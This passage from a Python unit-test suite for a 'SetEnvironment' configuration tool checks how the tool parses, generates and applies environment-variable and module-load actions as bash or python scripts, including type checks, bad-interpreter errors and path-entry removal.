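# A hedged demonstration (editorial addition, not part of the original\n # suite) of the behavior described above: ``os.path.expandvars()``\n # leaves unknown ${...} references untouched.\n os.environ.pop(\"ENVVAR_PARAM_MISSING\", None) # make sure it is unset\n self.assertEqual(\"B${ENVVAR_PARAM_MISSING}B\",\n os.path.expandvars(\"B${ENVVAR_PARAM_MISSING}B\"))\n\n 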
print(\"OK\")\n return\n\n def test_SetEnvironment_method_generate_actions_script(self):\n \"\"\"Test generate_actions_script()\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"CONFIG_A+\"\n print(\"Section : {}\".format(section))\n rval_actual = parser.generate_actions_script(section)\n self.assertIn('envvar_op set \"FOO\" \"bar\"', rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = None\n print(\"Section : {}\".format(section))\n with self.assertRaises(TypeError):\n rval_actual = parser.generate_actions_script(section)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_parse_section_generic_options_missing(self):\n \"\"\"\n A basic test that checks parsing via the ``configparserenhanceddata``\n object. If we parse via that then we probably *should* get an actions\n list constructed since it also calls the ``parse_section()`` method\n under the hood.\n \"\"\"\n section = \"CONFIG_A\"\n\n actions_expect = [\n {\n 'op': 'envvar_set', 'envvar': 'FOO', 'value': 'bar'\n }, {\n 'op': 'envvar_append', 'envvar': 'FOO', 'value': 'baz'\n }, {\n 'op': 'envvar_prepend', 'envvar': 'FOO', 'value': 'foo'\n }, {\n 'op': 'envvar_set', 'envvar': 'BAR', 'value': 'foo'\n }, {\n 'op': 'envvar_remove_substr', 'envvar': 'FOO', 'value': 'bar'\n }, {\n 'op': 'envvar_unset', 'envvar': 'FOO', 'value': None\n }\n ]\n\n rval_expect_cped = {}\n\n self._helper_parse_section(section, actions_expect, rval_expect_cped)\n\n return\n\n def test_SetEnvironment_parse_section_generic_options_exist(self):\n \"\"\"\n Testing the use of parsing a section with operations and generic options\n \"\"\"\n section = \"CONFIG_ENVVAR_WITH_GENERIC_OPTION\"\n\n actions_expect = [\n {\n 'op': 'envvar_set', 'envvar': 'FOO', 'value': 'bar'\n }, {\n 'op': 'envvar_append', 'envvar': 'FOO', 'value': 'baz'\n }, {\n 'op': 'envvar_prepend', 'envvar': 'FOO', 'value': 'foo'\n }\n ]\n\n rval_expect_cped = {'key1': 'value1'}\n\n self._helper_parse_section(section, actions_expect, rval_expect_cped)\n\n return\n\n def test_SetEnvironment_helper_apply_envvar_failure(self):\n \"\"\"\n Simulate a failure to set an envvar.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n section = \"CONFIG_A\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # Override the _exec_helper call to force a return value of 1. 
This should\n # trigger the `if output != 0` check at the end of `_apply_envvar`\n\n # In this case, the RuntimeError exception will be thrown.\n parser.exception_control_level = 5\n with patch.object(SetEnvironment, '_exec_helper', mock_function_return_1):\n with self.assertRaises(RuntimeError):\n rval = parser._apply_envvar(\"envvar_set\", \"FOO\", \"BAR\")\n self.assertEqual(1, rval)\n\n # In this case, `exception_control_level` is set to 0 so the RuntimeError\n # isn't raised but the command should still return a nonzero value.\n parser.exception_control_level = 0\n with patch.object(SetEnvironment, '_exec_helper', mock_function_return_1):\n rval = parser._apply_envvar(\"envvar_set\", \"FOO\", \"BAR\")\n self.assertNotEqual(0, rval)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actions_script_nohdr(self):\n \"\"\"\n Test `_gen_actions_script` without a header\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.exception_control_level = 5\n parser.debug_level = 5\n\n section = \"CONFIG_A\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n test_incl_hdr = False\n test_interp = \"bash\"\n rval_expect = dedent(\n \"\"\"\\\n # -------------------------------------------------\n # S E T E N V I R O N M E N T C O M M A N D S\n # -------------------------------------------------\n envvar_op set \"FOO\" \"bar\"\n envvar_op append \"FOO\" \"baz\"\n envvar_op prepend \"FOO\" \"foo\"\n envvar_op set \"BAR\" \"foo\"\n envvar_op remove_substr \"FOO\" \"bar\"\n envvar_op unset \"FOO\"\n \"\"\"\n ).strip()\n rval_actual = parser.generate_actions_script(\n section, incl_hdr=test_incl_hdr, incl_shebang=False, interp=test_interp\n )\n rval_actual = rval_actual.strip()\n\n self.assertEqual(rval_expect, rval_actual)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actions_script_badinterp(self):\n \"\"\"\n Test `_gen_actions_script` with a bad interpreter\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.exception_control_level = 5\n parser.debug_level = 5\n\n section = \"CONFIG_A\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # This should throw a ValueError because the `exception_control_event`\n # that gets raised is a `SERIOUS` one which causes a throw if\n # `exception_control_level` is >= 3.\n test_incl_hdr = True\n test_interp = \"invalid_interpreter\"\n with self.assertRaises(ValueError):\n parser.generate_actions_script(section, incl_hdr=test_incl_hdr, interp=test_interp)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # Test what happens if ECL is low enough to cause the SERIOUS event to\n # _not_ raise the ValueError but instead print out a big warning.\n # Setting `exception_control_level` to 2 will cause only CRITICAL 
events\n # to raise the exception.\n parser.exception_control_level = 2\n test_incl_hdr = True\n test_interp = \"invalid_interpreter\"\n rval_expect = \"\"\n rval_actual = parser.generate_actions_script(section, incl_hdr=test_incl_hdr, interp=test_interp)\n self.assertEqual(rval_expect, rval_actual)\n parser.exception_control_level = 5\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # Test what happens when there's an action entry that is missing either\n # `envvar` or `module` in its key(). This should throw a ValueError.\n test_incl_hdr = True\n test_interp = \"bash\"\n\n # add a bogus action that is missing either 'envvar' or 'module' from its\n # keys.\n parser.actions[section].append({'op': 'envvar_set', 'value': \"thevalue\", \"newkey\": \"???\"})\n\n with self.assertRaises(ValueError):\n parser.generate_actions_script(section, incl_hdr=test_incl_hdr, interp=test_interp)\n\n # Cleanup: Remove the bogus entry from the actions.\n del parser.actions[section][-1]\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_module_badinterp(self):\n \"\"\"\n Test the ``_gen_actioncmd_module`` command.\n\n Test that an exception is raised if ``interp`` is sent a bad\n parameter for the interpreter.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n operation = \"module_load\"\n module_name = \"gcc\"\n module_ver = \"7.2.0\"\n interpreter = \"bad interpreter name\"\n with self.assertRaises(ValueError):\n parser._gen_actioncmd_module(operation, module_name, module_ver, interp=interpreter)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_envvar_badinterp(self):\n \"\"\"\n Test the ``_gen_actioncmd_envvar`` command\n\n Test that an exception is raised if ``interp`` is sent a bad\n parameter for the interpreter.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n operation = \"envvar_set\"\n envvar_name = \"FOO\"\n envvar_val = \"BAR\"\n interpreter = \"bad interpreter name\"\n with self.assertRaises(ValueError):\n parser._gen_actioncmd_envvar(operation, envvar_name, envvar_val, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_envvar_badnumargs(self):\n \"\"\"\n Test the ``_gen_actioncmd_envvar`` command\n\n Test what happens if the wrong # of parameters is sent in for commands.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n envvar_name = \"FOO\"\n envvar_val = \"BAR\"\n interpreter = \"python\"\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # envvar_set requires 2 parameters.\n operation = \"envvar_set\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, envvar_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN 
]----------------------------------------\")\n # envvar_append requires 2 parameters.\n operation = \"envvar_append\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, envvar_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # envvar_prepend requires 2 parameters.\n operation = \"envvar_prepend\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, envvar_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # envvar_unset requires 1 parameters.\n operation = \"envvar_unset\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_module_badnumargs(self):\n \"\"\"\n Test the ``_gen_actioncmd_module`` command\n\n Test what happens if the wrong # of parameters is sent in for commands.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n module_name = \"gcc\"\n module_val = \"7.3.0\"\n interpreter = \"python\"\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_load requires 2 parameters.\n operation = \"module_load\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, module_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_unload requires 1 parameters.\n operation = \"module_unload\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_use requires 1 parameters\n operation = \"module_use\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_swap requires 2 parameters\n operation = \"module_swap\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, module_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_purge requires 0 parameters\n operation = \"module_purge\"\n cmd_expect = 'ModuleHelper.module(\"purge\")'\n cmd_actual = parser._gen_actioncmd_module(operation, interp=interpreter)\n self.assertEqual(cmd_expect, cmd_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_remove_prefix(self):\n \"\"\"\n Test the ``_remove_prefix`` method.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = \"envvar_use\"\n prefix = \"envvar_\"\n rval_expect = \"use\"\n rval_actual = 
parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = \"envvar_use\"\n prefix = \"varuse\"\n rval_expect = \"envvar_use\"\n rval_actual = parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = None\n prefix = \"envvar_\"\n rval_expect = \"envvar_use\"\n with self.assertRaises(TypeError):\n rval_actual = parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = \"envvar_use\"\n prefix = None\n rval_expect = \"envvar_use\"\n with self.assertRaises(TypeError):\n rval_actual = parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_set_if_empty_01(self):\n \"\"\"\n Test the ``envvar_set_if_empty`` handler.\n \"\"\"\n # Toggle generate-new-ground-truth-files mode. This should never be left True when checked in.\n gen_new_ground_truth = global_gen_new_ground_truth_files\n # ATTN: LEAVING THIS ENABLED SHOULD FAIL THIS TEST AFTER FILE GENERATION\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 5\n parser.exception_control_compact_warnings = True\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_SET_IF_EMPTY_01\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n parser.pretty_print_envvars(envvar_filter=[\"FOO_\", \"BAR_\", \"BAZ_\", \"BIF_\"], filtered_keys_only=True)\n\n envvar_foo_expect = \"FOO_VAL\"\n envvar_foo_actual = os.environ[\"FOO_VAR\"]\n self.assertEqual(envvar_foo_expect, envvar_foo_actual)\n\n envvar_bar_expect = \"BAR_VAL\"\n envvar_bar_actual = os.environ[\"BAR_VAR\"]\n self.assertEqual(envvar_bar_expect, envvar_bar_actual)\n\n envvar_baz_expect = \"BAZ_VAL\"\n envvar_baz_actual = os.environ[\"BAZ_VAR\"]\n self.assertEqual(envvar_baz_expect, envvar_baz_actual)\n\n envvar_bif_expect = \"\"\n envvar_bif_actual = os.environ[\"BIF_VAR\"]\n self.assertEqual(envvar_bif_expect, envvar_bif_actual)\n\n options = {\n \"prefix\": \"sie\",\n \"section\": section,\n \"header\": True,\n \"body\": True,\n \"shebang\": True,\n \"interpreter\": \"bash\"\n }\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n options[\"interpreter\"] = \"python\"\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n self.assertFalse(gen_new_ground_truth, \"Testing should not also generate new ground truth.\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_envvar_set_if_empty_01(self):\n \"\"\"\n Test the envvar_set_if_empty HELPER\n \"\"\"\n print(\"\\n\")\n\n print(\"-----[ TEST BEGIN 
]----------------------------------------\")\n print(\"Verify type-checking in envvar_set_if_empty\")\n\n with self.assertRaises(TypeError):\n envvar_set_if_empty(None, \"FOO\", allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_set_if_empty(\"FOO\", None, allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_set_if_empty(\"FOO\", \"FOO\", allow_empty=None)\n with self.assertRaises(ValueError):\n envvar_set_if_empty(\"FOO\", \"\", allow_empty=False)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return 0\n\n def test_SetEnvironment_helper_envvar_op_01(self):\n \"\"\"\n Test the envvar_op HELPER\n \"\"\"\n print(\"\\n\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Verify type-checking in envvar_op\")\n\n with self.assertRaises(TypeError):\n envvar_op(\"set_if_empty\", None, \"FOO\", allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_op(\"set_if_empty\", \"FOO\", None, allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_op(\"set_if_empty\", \"FOO\", \"FOO\", allow_empty=None)\n with self.assertRaises(ValueError):\n envvar_op(\"set_if_empty\", \"FOO\", \"\", allow_empty=False)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return 0\n\n def test_SetEnvironment_handler_envvar_remove_substr(self):\n \"\"\"\n Test the ``envvar_remove_substr`` handler.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_REMOVE_SUBSTR_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n parser.pretty_print_envvars(envvar_filter=[\"FOO\"], filtered_keys_only=True)\n\n envvar_foo_expect = \"BB\"\n envvar_foo_actual = os.environ[\"FOO\"]\n\n self.assertEqual(envvar_foo_expect, envvar_foo_actual)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_remove_substr_envvar_missing(self):\n \"\"\"\n Test the ``envvar_remove_substr`` handler when the envvar is missing / unset.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_REMOVE_SUBSTR_TEST_NO_ENVVAR\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n parser.pretty_print_envvars(envvar_filter=[\"FOO\"], filtered_keys_only=True)\n\n self.assertTrue(\"FOO\" not in os.environ.keys())\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_remove_path_entry(self):\n \"\"\"\n Test the ``envvar_remove_path_entry`` handler.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n section = \"ENVVAR_REMOVE_PATH_ENTRY_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n 
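# A hedged sketch (editorial addition, not taken from the SetEnvironment\n # docs): conceptually, removing a path entry amounts to filtering one\n # element out of an os.pathsep-joined list, as illustrated here.\n example_in = os.pathsep.join([\"/foo\", \"/bar\", \"/baz\"])\n example_out = os.pathsep.join(p for p in example_in.split(os.pathsep) if p != \"/bar\")\n self.assertEqual(os.pathsep.join([\"/foo\", \"/baz\"]), example_out)\n\n 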
# Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n parser.pretty_print_envvars(envvar_filter=[\"TEST_PATH1\"], filtered_keys_only=True)\n envvar_expect = os.pathsep.join([\"/foo\", \"/bar/baz\", \"/bif\"])\n envvar_actual = os.environ[\"TEST_PATH1\"]\n self.assertEqual(envvar_expect, envvar_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n parser.pretty_print_envvars(envvar_filter=[\"TEST_PATH2\"], filtered_keys_only=True)\n envvar_expect = os.pathsep.join([\"/foo\", \"/bar\", \"/bar/baz\", \"/bar\", \"/bif\"])\n envvar_actual = os.environ[\"TEST_PATH2\"]\n self.assertEqual(envvar_expect, envvar_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n parser.pretty_print_envvars(envvar_filter=[\"TEST_PATH3\"], filtered_keys_only=True)\n envvar_expect = os.pathsep.join([\"/foo\", \"/bar\", \"/bar\", \"/bif\"])\n envvar_actual = os.environ[\"TEST_PATH3\"]\n self.assertEqual(envvar_expect, envvar_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_assert_not_empty_01(self):\n \"\"\"Test the ``envvar-assert-not-empty`` command's functions.\n \"\"\"\n # Toggle generate-new-ground-truth-files mode. This should never be left True when checked in.\n gen_new_ground_truth = global_gen_new_ground_truth_files\n # ATTN: LEAVING THIS ENABLED SHOULD FAIL THIS TEST AFTER FILE GENERATION\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n section = \"ENVVAR_ASSERT_NOT_EMPTY\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n with self.assertRaises(ValueError):\n parser.apply(section)\n # Todo: is there a way to determine the # of calls to the assert?\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n script_bash_actual = parser.generate_actions_script(section, interp='bash')\n print(script_bash_actual)\n\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_01\" \"\"\\n', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_02\" \"\"\\n', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_03\" \"ERROR -', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_04\" \"\"\\n', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_05\" \"ERROR -', script_bash_actual)\n\n options = {\n \"prefix\": \"ane\",\n \"section\": section,\n \"header\": True,\n \"body\": True,\n \"shebang\": True,\n \"interpreter\": \"bash\"\n }\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST 
BEGIN ]----------------------------------------\")\n # Generate Python output\n script_python_actual = parser.generate_actions_script(section, interp='python')\n options[\"interpreter\"] = \"python\"\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n self.assertFalse(gen_new_ground_truth, \"Testing should not also generate new ground truth.\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_assert_not_empty_02(self):\n \"\"\"Test the ``envvar-assert-not-empty`` command's functions.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n section = \"ENVVAR_ASSERT_NOT_EMPTY_02\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n with self.assertRaises(ValueError):\n parser.apply(section)\n # Todo: is there a way to determine tne # of calls to the assert?\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n def test_SetEnvironment_write_actions_to_file(self):\n \"\"\"\n \"\"\"\n # Toggle generate-new-ground-truth-files mode. This should never be left True when checked in.\n gen_new_ground_truth = global_gen_new_ground_truth_files\n # ATTN: LEAVING THIS ENABLED SHOULD FAIL THIS TEST AFTER FILE GENERATION\n\n section = \"CONFIG_A+\"\n\n options_list = [\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": False,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": False,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": False,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n 
\"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": False,\n \"shebang\": False\n },\n ]\n\n for options in options_list:\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n self.assertFalse(gen_new_ground_truth, \"Testing should not also generate new ground truth.\")\n\n return\n\n def test_SetEnvironment_bash_env_val_with_special_chars_not_interpreted(self):\n \"\"\"\n This test is to ensure that values for an envvar_op that have\n special characters such as ; or * are not interpreted when envvar_op is\n called. Rather, they should be passed by value to this function.\n \"\"\"\n gen_new_ground_truth = global_gen_new_ground_truth_files\n options = {\n \"prefix\": \"special_chars\",\n \"section\": \"BASH_ENV_VAL_WITH_SPECIAL_CHARS_NOT_INTERPRETED\",\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": True,\n \"shebang\": True\n }\n filename = self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n p = subprocess.run(f\"source {filename}\", shell=True,\n stdout=subprocess.PIPE,stderr=subprocess.PIPE, universal_newlines=True)\n self.assertFalse(\"command not found\" in p.stderr)\n self.assertFalse(\"command not found\" in p.stdout)\n\n def test_SetEnvironment_write_actions_to_file_bad_interp(self):\n \"\"\"\n \"\"\"\n section = \"CONFIG_A+\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 5\n parser.exception_control_compact_warnings = True\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Raise exception on bad interpreter\")\n parser.exception_control_level = 5\n with self.assertRaises(ValueError):\n parser.write_actions_to_file(\"___tmp.txt\", section, interpreter=\"not a valid interpreter\")\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Warning on bad interpreter\")\n parser.exception_control_level = 2\n rval_expect = 1\n rval_actual = parser.write_actions_to_file(\n \"___tmp.txt\", section, interpreter=\"not a valid interpreter\"\n )\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n return\n\n def test_SetEnvironment_freefunc_envvar_assign(self):\n \"\"\"\n Test the free-function ``envvar_assign``\n \"\"\"\n print(\"\\n\")\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n with self.assertRaises(TypeError):\n envvar_set(None, \"BAR\")\n\n with self.assertRaises(TypeError):\n envvar_set(\"FOO\", None)\n\n with self.assertRaises(TypeError):\n envvar_set(\"FOO\", \"BAR\", None)\n\n envvar_set(\"FOO\", \"\", True)\n self.assertEqual(\"\", os.environ[\"FOO\"])\n del os.environ[\"FOO\"]\n\n with self.assertRaises(ValueError):\n 